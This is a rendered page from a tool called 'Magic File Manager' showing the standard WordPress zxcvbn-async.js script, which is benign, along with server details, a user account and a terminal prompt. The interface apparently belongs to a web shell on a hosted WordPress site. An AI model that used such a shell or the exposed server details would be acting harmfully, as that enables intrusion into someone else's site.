✨ Magic File Manager

🚀 Hostinger Optimized
🖥️ Server: LiteSpeed
💻 System: Linux indra.protondns.net 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
👤 User: bbmclients (1501)
🐘 PHP: 8.2.32
🚫 Disabled: ✨ NONE

💻 Terminal

📁 /home/bbmclients/meghaahuja.com
$

📄 zxcvbn-async.js

📁 Path: /home/bbmclients/meghaahuja.com/wp-includes/js/zxcvbn-async.js
📊 Size: 821 B
🔒 Perm: 0644
📝 MIME: text/plain
/**
 * @output wp-includes/js/zxcvbn-async.js
 */

/* global _zxcvbnSettings */

/**
 * Loads zxcvbn asynchronously by inserting an async script tag before the first
 * script tag on the page.
 *
 * This makes sure zxcvbn isn't blocking loading the page as it is a big
 * library. The source for zxcvbn is read from the _zxcvbnSettings global.
 */
(function() {
  var async_load = function() {
    var first, s;
    s = document.createElement('script');
    s.src = _zxcvbnSettings.src;
    s.type = 'text/javascript';
    s.async = true;
    first = document.getElementsByTagName('script')[0];
    return first.parentNode.insertBefore(s, first);
  };

  if (window.attachEvent != null) {
    window.attachEvent('onload', async_load);
  } else {
    window.addEventListener('load', async_load, false);
  }
}).call(this);
← Back📥 Raw✏️ Edit🔒 Chmod
✨ File Manager Magic ✨